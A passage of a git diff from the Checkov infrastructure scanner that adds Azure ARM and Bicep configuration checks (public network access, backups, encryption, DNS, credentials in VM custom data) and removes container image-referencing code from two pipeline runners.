+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class PostgreSQLServerHasPublicAccessDisabled(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure that PostgreSQL server disables public network access"
+        id = "CKV_AZURE_68"
+        supported_resources = ('Microsoft.DBforPostgreSQL/servers',)
+        categories = [CheckCategories.NETWORKING]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,
+                         missing_block_result=CheckResult.FAILED)
+
+    def get_inspected_key(self) -> str:
+        return 'properties/publicNetworkAccess'
+
+    def get_expected_value(self) -> str:
+        return "Disabled"
+
+
+check = PostgreSQLServerHasPublicAccessDisabled()
diff --git a/checkov/arm/checks/resource/PostgressSQLGeoBackupEnabled.py b/checkov/arm/checks/resource/PostgressSQLGeoBackupEnabled.py
new file mode 100644
index 00000000000..603067a5653
--- /dev/null
+++ b/checkov/arm/checks/resource/PostgressSQLGeoBackupEnabled.py
@@ -0,0 +1,22 @@
+from typing import Any
+
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class PostgressSQLGeoBackupEnabled(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure that PostgreSQL server enables geo-redundant backups"
+        id = "CKV_AZURE_102"
+        supported_resources = ['Microsoft.DBforPostgreSQL/servers']
+        categories = [CheckCategories.BACKUP_AND_RECOVERY]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> Any:
+        return 'properties/storageProfile/geoRedundantBackup'
+
+    def get_expected_value(self) -> str:
+        return 'Enabled'
+
+
+check = PostgressSQLGeoBackupEnabled()
diff --git a/checkov/arm/checks/resource/PubsubSKUSLA.py b/checkov/arm/checks/resource/PubsubSKUSLA.py
new file mode 100644
index 00000000000..3c2c9f8180d
--- /dev/null
+++ b/checkov/arm/checks/resource/PubsubSKUSLA.py
@@ -0,0 +1,24 @@
+from __future__ import annotations
+
+from typing import Any
+
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_negative_value_check import BaseResourceNegativeValueCheck
+
+
+class PubsubSKUSLA(BaseResourceNegativeValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure Web PubSub uses a SKU with an SLA"
+        id = "CKV_AZURE_175"
+        supported_resources = ("Microsoft.SignalRService/webPubSub",)
+        categories = (CheckCategories.GENERAL_SECURITY,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,)
+
+    def get_inspected_key(self) -> str:
+        return "sku/name"
+
+    def get_forbidden_values(self) -> Any:
+        return "Free_F1"
+
+
+check = PubsubSKUSLA()
diff --git a/checkov/arm/checks/resource/PubsubSpecifyIdentity.py b/checkov/arm/checks/resource/PubsubSpecifyIdentity.py
new file mode 100644
index 00000000000..056fa4002a7
--- /dev/null
+++ b/checkov/arm/checks/resource/PubsubSpecifyIdentity.py
@@ -0,0 +1,23 @@
+from typing import Any
+
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.consts import ANY_VALUE
+from checkov.common.models.enums import CheckCategories
+
+
+class PubsubSpecifyIdentity(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure Web PubSub uses managed identities to access Azure resources"
+        id = "CKV_AZURE_176"
+        supported_resources = ["Microsoft.SignalRService/webPubSub"]
+        categories = [CheckCategories.IAM]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return "identity/type"
+
+    def get_expected_value(self) -> Any:
+        return ANY_VALUE
+
+
+check = PubsubSpecifyIdentity()
diff --git a/checkov/arm/checks/resource/SQLDatabaseZoneRedundant.py b/checkov/arm/checks/resource/SQLDatabaseZoneRedundant.py
new file mode 100644
index 00000000000..7d4aeaf648b
--- /dev/null
+++ b/checkov/arm/checks/resource/SQLDatabaseZoneRedundant.py
@@ -0,0 +1,43 @@
+from __future__ import annotations
+
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class SQLDatabaseZoneRedundant(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        """
+        This is a best practise which helps to:
+        - Improved High Availability: Zone redundancy ensures that your database is replicated
+          across Availability Zones within an Azure region. If one Availability Zone experiences an outage,
+          your database continues to operate from the other zones, minimizing downtime.
+        - Reduced Maintenance Downtime: Zone-redundant configurations often require
+          less planned maintenance downtime because updates and patches can be applied to
+          one zone at a time while the other zones continue to serve traffic.
+        - Improved Scalability: Zone-redundant configurations are designed to scale with your workload.
+          You can take advantage of features like Hyperscale to dynamically adjust resources based on
+          your database's performance needs.
+        - Improved SLA: Azure SQL Database zone-redundant configurations typically offer
+          a higher service-level agreement (SLA) for availability compared to non-zone-redundant configurations.
+
+        However, it's critical to note that:
+        Note that:
+        - Zone-redundant availability is available to databases in the
+          General Purpose, Premium, Business Critical and Hyperscale service tiers of the vCore purchasing model,
+          and not the Basic and Standard service tiers of the DTU-based purchasing model.
+        - This may not be required for:
+           - Databases that supports applications which doesn't a high maturity in terms of "High Availability"
+           - Databases that are very sensitive to network latency that may increase the transaction commit time,
+             and thus impact the performance of some OLTP workloads.
+        """
+        name = "Ensure the Azure SQL Database Namespace is zone redundant"
+        id = "CKV_AZURE_229"
+        supported_resources = ["Microsoft.Sql/servers/databases",]
+        categories = [CheckCategories.BACKUP_AND_RECOVERY,]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return "properties/zoneRedundant"
+
+
+check = SQLDatabaseZoneRedundant()
diff --git a/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py b/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py
index b67c9bbb857..45bfd1ef0b5 100644
--- a/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py
+++ b/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py
@@ -15,7 +15,7 @@ def __init__(self) -> None:
             :return: <CheckResult>
         """
         name = "Ensure Storage Account is using the latest version of TLS encryption"
-        id = "CKV_AZURE_236"
+        id = "CKV_AZURE_44"
         supported_resources = ('Microsoft.Storage/storageAccounts',)
         categories = (CheckCategories.NETWORKING,)
 
diff --git a/checkov/arm/checks/resource/StorageAccountName.py b/checkov/arm/checks/resource/StorageAccountName.py
new file mode 100644
index 00000000000..41b5bfd6f42
--- /dev/null
+++ b/checkov/arm/checks/resource/StorageAccountName.py
@@ -0,0 +1,48 @@
+from __future__ import annotations
+
+import re
+import typing
+
+from checkov.common.models.enums import CheckResult, CheckCategories
+from checkov.arm.base_resource_check import BaseResourceCheck
+
+
+STO_NAME_REGEX = re.compile(r"^[a-z0-9]{3,24}$")
+VARIABLE_REFS = ("local.", "module.", "var.", "random_string.", "random_id.", "random_integer.", "random_pet.",
+                 "azurecaf_name", "each.")
+
+
+class StorageAccountName(BaseResourceCheck):
+    def __init__(self) -> None:
+        """
+        Initializes a check to ensure that Storage Accounts adhere to the naming rules.
+
+        The naming reference for Storage Accounts can be found here:
+        https://docs.microsoft.com/en-us/azure/storage/common/storage-account-overview#naming-storage-accounts
+        """
+        name = "Ensure Storage Accounts adhere to the naming rules"
+        id = "CKV_AZURE_43"
+        supported_resources = ['Microsoft.Storage/storageAccounts']
+        categories = [CheckCategories.CONVENTION]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf: dict[str, typing.Any]) -> CheckResult:
+        """
+        The Storage Account naming reference:
+        https://docs.microsoft.com/en-us/azure/storage/common/storage-account-overview#naming-storage-accounts
+        :param conf: azurerm_storage_account configuration
+        :return: <CheckResult>
+        """
+        if "name" in conf.keys():
+            name = conf["name"]
+            if name:
+                name = str(name)
+                if any(x in name for x in VARIABLE_REFS):
+                    # in the case we couldn't evaluate the name, just ignore
+                    return CheckResult.UNKNOWN
+                if re.findall(STO_NAME_REGEX, name):
+                    return CheckResult.PASSED
+        return CheckResult.FAILED
+
+
+check = StorageAccountName()
diff --git a/checkov/arm/checks/resource/StorageAccountsUseReplication.py b/checkov/arm/checks/resource/StorageAccountsUseReplication.py
new file mode 100644
index 00000000000..86b0de0d9bd
--- /dev/null
+++ b/checkov/arm/checks/resource/StorageAccountsUseReplication.py
@@ -0,0 +1,24 @@
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+from typing import Any, List
+
+
+class StorageAccountsUseReplication(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure that Storage Accounts use replication"
+        id = "CKV_AZURE_206"
+        supported_resources = ("Microsoft.Storage/storageAccounts",)
+        categories = (CheckCategories.BACKUP_AND_RECOVERY,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,)
+
+    def get_inspected_key(self) -> str:
+        return "sku/name"
+
+    def get_expected_value(self) -> Any:
+        return "Standard_GRS"
+
+    def get_expected_values(self) -> List[Any]:
+        return ["Standard_GRS", "Standard_RAGRS", "Standard_GZRS", "Standard_RAGZRS"]
+
+
+check = StorageAccountsUseReplication()
diff --git a/checkov/arm/checks/resource/StorageSyncPublicAccessDisabled.py b/checkov/arm/checks/resource/StorageSyncPublicAccessDisabled.py
new file mode 100644
index 00000000000..cca500a26dd
--- /dev/null
+++ b/checkov/arm/checks/resource/StorageSyncPublicAccessDisabled.py
@@ -0,0 +1,21 @@
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class NetworkInterfaceEnableIPForwarding(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure that Azure File Sync disables public network access"
+        id = "CKV_AZURE_64"
+        supported_resources = ('Microsoft.StorageSync/storageSyncServices',)
+        categories = (CheckCategories.NETWORKING,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,
+                         missing_block_result=CheckResult.FAILED)
+
+    def get_inspected_key(self) -> str:
+        return 'properties/incomingTrafficPolicy'
+
+    def get_expected_value(self) -> str:
+        return 'AllowVirtualNetworksOnly'
+
+
+check = NetworkInterfaceEnableIPForwarding()
diff --git a/checkov/arm/checks/resource/SynapseWorkspaceAdministratorLoginPasswordHidden.py b/checkov/arm/checks/resource/SynapseWorkspaceAdministratorLoginPasswordHidden.py
new file mode 100644
index 00000000000..bfff551fa39
--- /dev/null
+++ b/checkov/arm/checks/resource/SynapseWorkspaceAdministratorLoginPasswordHidden.py
@@ -0,0 +1,23 @@
+from __future__ import annotations
+
+from typing import Any
+
+from checkov.common.models.enums import CheckResult, CheckCategories
+from checkov.arm.base_resource_check import BaseResourceCheck
+
+
+class SynapseWorkspaceAdministratorLoginPasswordHidden(BaseResourceCheck):
+    def __init__(self) -> None:
+        name = "Ensure Azure Synapse Workspace administrator login password is not exposed"
+        id = "CKV_AZURE_239"
+        supported_resources = ['Microsoft.Synapse/workspaces']
+        categories = [CheckCategories.SECRETS]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult:
+        if conf.get("properties", {}).get("sqlAdministratorLoginPassword"):
+            return CheckResult.FAILED
+        return CheckResult.PASSED
+
+
+check = SynapseWorkspaceAdministratorLoginPasswordHidden()
diff --git a/checkov/arm/checks/resource/SynapseWorkspaceCMKEncryption.py b/checkov/arm/checks/resource/SynapseWorkspaceCMKEncryption.py
new file mode 100644
index 00000000000..225c6ee31c9
--- /dev/null
+++ b/checkov/arm/checks/resource/SynapseWorkspaceCMKEncryption.py
@@ -0,0 +1,24 @@
+from __future__ import annotations
+from typing import Any
+from checkov.arm.base_resource_check import BaseResourceCheck
+from checkov.common.models.enums import CheckResult, CheckCategories
+
+
+class SynapseWorkspaceCMKEncryption(BaseResourceCheck):
+    def __init__(self) -> None:
+        name = "Ensure Azure Synapse Workspace is encrypted with a CMK"
+        id = "CKV_AZURE_240"
+        supported_resources = ['Microsoft.Synapse/workspaces']
+        categories = [CheckCategories.ENCRYPTION]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult:
+        encryption = conf.get("properties", {}).get("encryption", {})
+
+        if "cmk" in encryption:
+            return CheckResult.PASSED
+
+        return CheckResult.FAILED
+
+
+check = SynapseWorkspaceCMKEncryption()
diff --git a/checkov/arm/checks/resource/SynapseWorkspaceEnablesDataExfilProtection.py b/checkov/arm/checks/resource/SynapseWorkspaceEnablesDataExfilProtection.py
new file mode 100644
index 00000000000..1705ad191e5
--- /dev/null
+++ b/checkov/arm/checks/resource/SynapseWorkspaceEnablesDataExfilProtection.py
@@ -0,0 +1,17 @@
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class SynapseWorkspaceEnablesDataExfilProtection(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure that Synapse workspace has data_exfiltration_protection_enabled"
+        id = "CKV_AZURE_157"
+        supported_resources = ["Microsoft.Synapse/workspaces"]
+        categories = [CheckCategories.GENERAL_SECURITY]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return 'properties/dataExfiltrationProtectionEnabled'
+
+
+check = SynapseWorkspaceEnablesDataExfilProtection()
diff --git a/checkov/arm/checks/resource/VMCredsInCustomData.py b/checkov/arm/checks/resource/VMCredsInCustomData.py
new file mode 100644
index 00000000000..281710a675a
--- /dev/null
+++ b/checkov/arm/checks/resource/VMCredsInCustomData.py
@@ -0,0 +1,32 @@
+from typing import List, Dict, Any
+
+from checkov.common.models.enums import CheckResult, CheckCategories
+from checkov.common.util.secrets import string_has_secrets
+from checkov.arm.base_resource_value_check import BaseResourceCheck
+
+
+class VMCredsInCustomData(BaseResourceCheck):
+    def __init__(self) -> None:
+        name = "Ensure that no sensitive credentials are exposed in VM custom_data"
+        id = "CKV_AZURE_45"
+        supported_resources = ("Microsoft.Compute/virtualMachines",)
+        categories = (CheckCategories.SECRETS,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,)
+
+    def scan_resource_conf(self, conf: Dict[str, Any]) -> CheckResult:
+        properties = conf.get("properties")
+        if properties and isinstance(properties, dict):
+            os_profile = properties.get("osProfile")
+            if isinstance(os_profile, dict):
+                custom_data = os_profile.get("customData")
+                if isinstance(custom_data, str):
+                    if string_has_secrets(custom_data):
+                        conf[f'{self.id}_secret'] = custom_data
+                        return CheckResult.FAILED
+        return CheckResult.PASSED
+
+    def get_evaluated_keys(self) -> List[str]:
+        return ["properties/osProfile/customData"]
+
+
+check = VMCredsInCustomData()
diff --git a/checkov/arm/checks/resource/VMStorageOsDisk.py b/checkov/arm/checks/resource/VMStorageOsDisk.py
new file mode 100644
index 00000000000..50a4a1d5d84
--- /dev/null
+++ b/checkov/arm/checks/resource/VMStorageOsDisk.py
@@ -0,0 +1,36 @@
+from typing import Any, Dict
+
+from checkov.common.models.enums import CheckResult, CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceCheck
+
+
+class VMStorageOsDisk(BaseResourceCheck):
+    def __init__(self) -> None:
+        name = "Ensure that Virtual Machines use managed disks"
+        id = "CKV_AZURE_92"
+        supported_resources = ("Microsoft.Compute/virtualMachines",)
+        categories = (CheckCategories.GENERAL_SECURITY,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf: Dict[str, Any]) -> CheckResult:
+        properties = conf.get('properties')
+        if not properties or not isinstance(properties, dict):
+            return CheckResult.PASSED
+        storage_profile = properties.get('storageProfile')
+        if not storage_profile or not isinstance(storage_profile, dict):
+            return CheckResult.PASSED
+        os_disk = storage_profile.get('osDisk')
+        data_disks = list(storage_profile.get('dataDisks', []))
+        if os_disk and isinstance(os_disk, dict) and "vhd" in os_disk:
+            self.evaluated_keys = ['os_disk']
+            return CheckResult.FAILED
+        if data_disks and any(isinstance(data_disk, dict) and "vhd" in data_disk for data_disk in data_disks):
+            self.evaluated_keys = ['data_disks']
+            return CheckResult.FAILED
+        self.evaluated_keys = ['os_disk'] if os_disk else []
+        if data_disks:
+            self.evaluated_keys.append('data_disks')
+        return CheckResult.PASSED
+
+
+check = VMStorageOsDisk()
diff --git a/checkov/arm/checks/resource/VnetLocalDNS.py b/checkov/arm/checks/resource/VnetLocalDNS.py
new file mode 100644
index 00000000000..d3687483afa
--- /dev/null
+++ b/checkov/arm/checks/resource/VnetLocalDNS.py
@@ -0,0 +1,48 @@
+from ipaddress import ip_network, ip_address
+from typing import Any, List, Dict
+
+from checkov.arm.base_resource_check import BaseResourceCheck
+from checkov.common.models.enums import CheckCategories, CheckResult
+
+
+class VnetLocalDNS(BaseResourceCheck):
+    def __init__(self) -> None:
+        """Avoid taking a dependency on external DNS servers
+                 for local communication such as those deployed on-premises.
+                Where possible consider deploying Azure Private DNS Zones,
+                 a platform-as-a-service (PaaS) DNS service for VNETs"""
+
+        name = "Ensure that VNET uses local DNS addresses"
+        id = "CKV_AZURE_183"
+        supported_resources = ("Microsoft.Network/virtualNetworks",)
+        categories = [CheckCategories.NETWORKING, ]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf: Dict[str, Dict[str, Dict[str, List[Any]]]]) -> CheckResult:
+        if "properties" in conf and "dhcpOptions" in conf["properties"]:
+            if "dnsServers" in conf["properties"]["dhcpOptions"]:
+                if isinstance(conf["properties"]["dhcpOptions"]["dnsServers"], list):
+                    dns_servers = conf["properties"]["dhcpOptions"]["dnsServers"]
+                    if dns_servers:
+                        for ip in dns_servers:
+                            if "addressSpace" in conf["properties"] and conf["properties"]["addressSpace"]:
+                                if "addressPrefixes" in conf["properties"]["addressSpace"]:
+                                    if isinstance(conf["properties"]["addressSpace"]["addressPrefixes"], list):
+                                        address_spaces = conf["properties"]["addressSpace"]["addressPrefixes"]
+                                        if isinstance(address_spaces, list):
+                                            for address_range in address_spaces:
+                                                if not isinstance(address_range, str):
+                                                    continue
+                                                try:
+                                                    net = ip_network(address_range)
+                                                    ip_add = ip_address(ip) if isinstance(ip, str) else None
+                                                except ValueError:
+                                                    return CheckResult.UNKNOWN
+                                                if isinstance(ip, str) and ip_add in net:
+                                                    return CheckResult.PASSED
+                    self.evaluated_keys = ["dnsServers"]
+                    return CheckResult.FAILED
+        return CheckResult.PASSED
+
+
+check = VnetLocalDNS()
diff --git a/checkov/arm/checks/resource/VnetSingleDNSServer.py b/checkov/arm/checks/resource/VnetSingleDNSServer.py
new file mode 100644
index 00000000000..e449b388359
--- /dev/null
+++ b/checkov/arm/checks/resource/VnetSingleDNSServer.py
@@ -0,0 +1,37 @@
+from typing import Any, List, Dict
+
+from checkov.arm.base_resource_check import BaseResourceCheck
+from checkov.common.models.enums import CheckCategories, CheckResult
+
+
+class VnetSingleDNSServer(BaseResourceCheck):
+
+    def __init__(self) -> None:
+        """Using a single DNS server may indicate a single point of failure
+        where the DNS IP address is not load balanced."""
+        name = "Ensure that VNET has at least 2 connected DNS Endpoints"
+        id = "CKV_AZURE_182"
+        supported_resources = ("Microsoft.Network/networkInterfaces", "Microsoft.Network/virtualNetworks")
+        categories = (CheckCategories.NETWORKING,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf: Dict[str, Dict[str, Dict[str, List[Any]]]]) -> CheckResult:
+        if "properties" in conf and "dnsSettings" in conf["properties"]:
+            if "dnsServers" in conf["properties"]["dnsSettings"] and isinstance(
+                    conf["properties"]["dnsSettings"]["dnsServers"], list):
+                dns_servers = conf["properties"]["dnsSettings"]["dnsServers"]
+                if dns_servers and len(dns_servers) == 1:
+                    self.evaluated_keys = ["dnsServers"]
+                    return CheckResult.FAILED
+        else:
+            if "properties" in conf and "dhcpOptions" in conf["properties"]:
+                if "dnsServers" in conf["properties"]["dhcpOptions"] and isinstance(
+                        conf["properties"]["dhcpOptions"]["dnsServers"], list):
+                    dns_servers = conf["properties"]["dhcpOptions"]["dnsServers"]
+                    if dns_servers and len(dns_servers) == 1:
+                        self.evaluated_keys = ["dnsServers"]
+                        return CheckResult.FAILED
+        return CheckResult.PASSED
+
+
+check = VnetSingleDNSServer()
diff --git a/checkov/arm/checks/resource/WinVMAutomaticUpdates.py b/checkov/arm/checks/resource/WinVMAutomaticUpdates.py
new file mode 100644
index 00000000000..ecbe38ee424
--- /dev/null
+++ b/checkov/arm/checks/resource/WinVMAutomaticUpdates.py
@@ -0,0 +1,20 @@
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class WinVMAutomaticUpdates(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure Windows VM enables automatic updates"
+        id = "CKV_AZURE_177"
+        supported_resources = ("Microsoft.Compute/virtualMachines", "Microsoft.Compute/virtualMachineScaleSets")
+        categories = (CheckCategories.GENERAL_SECURITY,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,
+                         missing_block_result=CheckResult.PASSED,)
+
+    def get_inspected_key(self) -> str:
+        if self.entity_type == "Microsoft.Compute/virtualMachineScaleSets":
+            return "properties/virtualMachineProfile/osProfile/windowsConfiguration/enableAutomaticUpdates"
+        return "properties/osProfile/windowsConfiguration/enableAutomaticUpdates"
+
+
+check = WinVMAutomaticUpdates()
diff --git a/checkov/azure_pipelines/image_referencer/manager.py b/checkov/azure_pipelines/image_referencer/manager.py
deleted file mode 100644
index e87cd8f9955..00000000000
--- a/checkov/azure_pipelines/image_referencer/manager.py
+++ /dev/null
@@ -1,13 +0,0 @@
-from __future__ import annotations
-
-from typing import Any
-
-from checkov.azure_pipelines.image_referencer.provider import AzurePipelinesProvider
-from checkov.common.images.workflow.image_referencer_manager import WorkflowImageReferencerManager
-
-
-class AzurePipelinesImageReferencerManager(WorkflowImageReferencerManager):
-
-    def __init__(self, workflow_config: dict[str, Any], file_path: str):
-        provider = AzurePipelinesProvider(workflow_config=workflow_config, file_path=file_path)
-        super().__init__(workflow_config, file_path, provider)
diff --git a/checkov/azure_pipelines/image_referencer/provider.py b/checkov/azure_pipelines/image_referencer/provider.py
deleted file mode 100644
index 7bd00e0bf6f..00000000000
--- a/checkov/azure_pipelines/image_referencer/provider.py
+++ /dev/null
@@ -1,71 +0,0 @@
-from __future__ import annotations
-
-from typing import Any
-
-from checkov.common.images.image_referencer import Image
-from checkov.azure_pipelines.common.resource_id_utils import generate_resource_key_recursive
-from checkov.common.images.workflow.image_referencer_provider import WorkflowImageReferencerProvider
-
-
-class AzurePipelinesProvider(WorkflowImageReferencerProvider):
-
-    def __init__(self, workflow_config: dict[str, Any], file_path: str):
-        super().__init__(workflow_config, file_path)
-        self.supported_keys = "container"
-
-    def extract_images_from_workflow(self) -> list[Image]:
-        """
-        We use a general extraction in azure_pipelines because we can display images in different ways:
-            - container
-            - container.image
-            - resources.containers[].container...
-            - jobs[].container...
-            - jobs[].steps.task.inputs.container...
-            - jobs[].strategy.container...
-            - stages[].jobs[]...
-        """
-        images = self.extract_images_from_dict(self.workflow_config)
-        return images
-
-    def extract_images_from_list(self, objects_list: list[dict[str, Any]]) -> list[Image]:
-        images = []
-        for job in objects_list:
-            if isinstance(job, dict):
-                images.extend(self.extract_images_from_dict(job))
-            if isinstance(job, list):
-                images.extend(self.extract_images_from_list(job))
-        return images
-
-    def extract_images_from_dict(self, job: dict[str, Any]) -> list[Image]:
-        images = []
-        start_line, end_line = AzurePipelinesProvider._get_start_end_lines(job)
-        for key, sub_job in job.items():
-            if key == self.supported_keys:
-                image = self.create_image(sub_job, start_line, end_line)
-                if image:
-                    images.append(image)
-            elif isinstance(sub_job, dict):
-                images.extend(self.extract_images_from_dict(sub_job))
-            elif isinstance(sub_job, list):
-                images.extend(self.extract_images_from_list(sub_job))
-        return images
-
-    def create_image(self, container: dict[str, Any] | str, start_line: int, end_line: int) -> Image | None:
-        image_name = ''
-        if isinstance(container, str):
-            image_name = container
-        elif isinstance(container, dict):
-            if 'image' in container:
-                image_name = container['image']
-        related_resource_id = generate_resource_key_recursive(file_conf=self.workflow_config,
-                                                              resource_key='',
-                                                              start_line=start_line,
-                                                              end_line=end_line)
-        if image_name and related_resource_id:
-            return Image(
-                file_path=self.file_path,
-                name=image_name,
-                start_line=start_line,
-                end_line=end_line,
-                related_resource_id=related_resource_id)
-        return None
diff --git a/checkov/azure_pipelines/runner.py b/checkov/azure_pipelines/runner.py
index baf6a8535c5..2ff89a2c387 100644
--- a/checkov/azure_pipelines/runner.py
+++ b/checkov/azure_pipelines/runner.py
@@ -1,24 +1,19 @@
 from __future__ import annotations
 
-import os
 from typing import TYPE_CHECKING, Any, Optional
 
 from checkov.azure_pipelines.checks.registry import registry
 from checkov.azure_pipelines.common.resource_id_utils import generate_resource_key_recursive
-from checkov.azure_pipelines.image_referencer.manager import AzurePipelinesImageReferencerManager
-from checkov.common.images.image_referencer import ImageReferencerMixin, Image
 from checkov.common.output.report import CheckType, Report
 from checkov.runner_filter import RunnerFilter
 from checkov.yaml_doc.runner import Runner as YamlRunner
 
-
 if TYPE_CHECKING:
     from checkov.common.checks.base_check_registry import BaseCheckRegistry
     from collections.abc import Iterable
-    from networkx import DiGraph
 
 
-class Runner(ImageReferencerMixin["dict[str, dict[str, Any] | list[dict[str, Any]]]"], YamlRunner):
+class Runner(YamlRunner):
     check_type = CheckType.AZURE_PIPELINES  # noqa: CCE003  # a static attribute
 
     def require_external_checks(self) -> bool:
@@ -57,43 +52,4 @@ def run(
         runner_filter = runner_filter or RunnerFilter()
         report = super().run(root_folder=root_folder, external_checks_dir=external_checks_dir,
                              files=files, runner_filter=runner_filter, collect_skip_comments=collect_skip_comments)
-        if runner_filter.run_image_referencer:
-            if files:
-                # 'root_folder' shouldn't be empty to remove the whole path later and only leave the shortened form
-                root_folder = os.path.split(os.path.commonprefix(files))[0]
-
-            image_report = self.check_container_image_references(
-                root_path=root_folder,
-                runner_filter=runner_filter,
-                definitions=self.definitions
-            )
-
-            if image_report:
-                return [report, image_report]  # type:ignore[list-item]  # report can only be of type Report, not a list
-
         return report
-
-    def extract_images(
-            self,
-            graph_connector: DiGraph | None = None,
-            definitions: dict[str, dict[str, Any] | list[dict[str, Any]]] | None = None,
-            definitions_raw: dict[str, list[tuple[int, str]]] | None = None
-    ) -> list[Image]:
-        images: list[Image] = []
-        if not definitions:
-            return images
-
-        for file, config in definitions.items():
-            if isinstance(config, list):
-                continue
-            is_container = False
-            for row in self.definitions_raw.get(file, []):
-                if 'container' in row[1]:
-                    is_container = True
-                    break
-            if not is_container:
-                return images
-            manager = AzurePipelinesImageReferencerManager(workflow_config=config, file_path=file)
-            images.extend(manager.extract_images_from_workflow())
-
-        return images
diff --git a/checkov/bicep/checks/graph_checks/SQLServerAuditingRetention90Days.yaml b/checkov/bicep/checks/graph_checks/SQLServerAuditingRetention90Days.yaml
new file mode 100644
index 00000000000..8283ee5d3bf
--- /dev/null
+++ b/checkov/bicep/checks/graph_checks/SQLServerAuditingRetention90Days.yaml
@@ -0,0 +1,34 @@
+metadata:
+  id: "CKV_AZURE_24"
+  name: "Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers"
+  category: "LOGGING"
+definition:
+  and:
+    - cond_type: "filter"
+      attribute: "resource_type"
+      value:
+        - "Microsoft.Sql/servers"
+      operator: "within"
+    - cond_type: "connection"
+      resource_types:
+        - "Microsoft.Sql/servers"
+      connected_resource_types:
+        - "Microsoft.Sql/servers/auditingSettings"
+      operator: "exists"
+    - cond_type: "attribute"
+      resource_types:
+        - "Microsoft.Sql/servers/auditingSettings"
+      attribute: "properties.retentionDays"
+      operator: "exists"
+    - cond_type: "attribute"
+      resource_types:
+        - "Microsoft.Sql/servers/auditingSettings"
+      attribute: "properties.retentionDays"
+      operator: "greater_than_or_equal"
+      value: 90
+    - cond_type: "attribute"
+      resource_types:
+        - "Microsoft.Sql/servers/auditingSettings"
+      attribute: "properties.state"
+      operator: "equals"
+      value: Enabled
diff --git a/checkov/bitbucket_pipelines/runner.py b/checkov/bitbucket_pipelines/runner.py
index 9114527adba..3f617c8768a 100644
--- a/checkov/bitbucket_pipelines/runner.py
+++ b/checkov/bitbucket_pipelines/runner.py
@@ -1,11 +1,8 @@
 from __future__ import annotations
 
-from typing import Any, TYPE_CHECKING, cast
-
-import jmespath
+from typing import Any, TYPE_CHECKING
 
 from checkov.bitbucket_pipelines.registry import registry
-from checkov.common.images.image_referencer import ImageReferencer, Image
 from checkov.common.bridgecrew.check_type import CheckType
 from checkov.yaml_doc.runner import Runner as YamlRunner
 
@@ -13,7 +10,7 @@
     from checkov.common.checks.base_check_registry import BaseCheckRegistry
 
 
-class Runner(YamlRunner, ImageReferencer):
+class Runner(YamlRunner):
     check_type = CheckType.BITBUCKET_PIPELINES  # noqa: CCE003  # a static attribute
 
     def __init__(self) -> None:
@@ -25,15 +22,6 @@ def require_external_checks(self) -> bool:
     def import_registry(self) -> BaseCheckRegistry:
         return registry
 
-    @staticmethod
-    def _parse_file(
-        f: str, file_content: str | None = None
-    ) -> tuple[dict[str, Any] | list[dict[str, Any]], list[tuple[int, str]]] | None:
-        if Runner.is_workflow_file(f):
-            return YamlRunner._parse_file(f)
-
-        return None
-
     @staticmethod
     def is_workflow_file(file_path: str) -> bool:
         """
@@ -41,103 +29,11 @@ def is_workflow_file(file_path: str) -> bool:
         """
         return file_path.endswith(("bitbucket-pipelines.yml", "bitbucket-pipelines.yaml"))
 
-    def get_images(self, file_path: str) -> set[Image]:
-        """
-        Get container images mentioned in a file
-        :param file_path: File to be inspected
-
-        File sample that will return 4 Image objects:
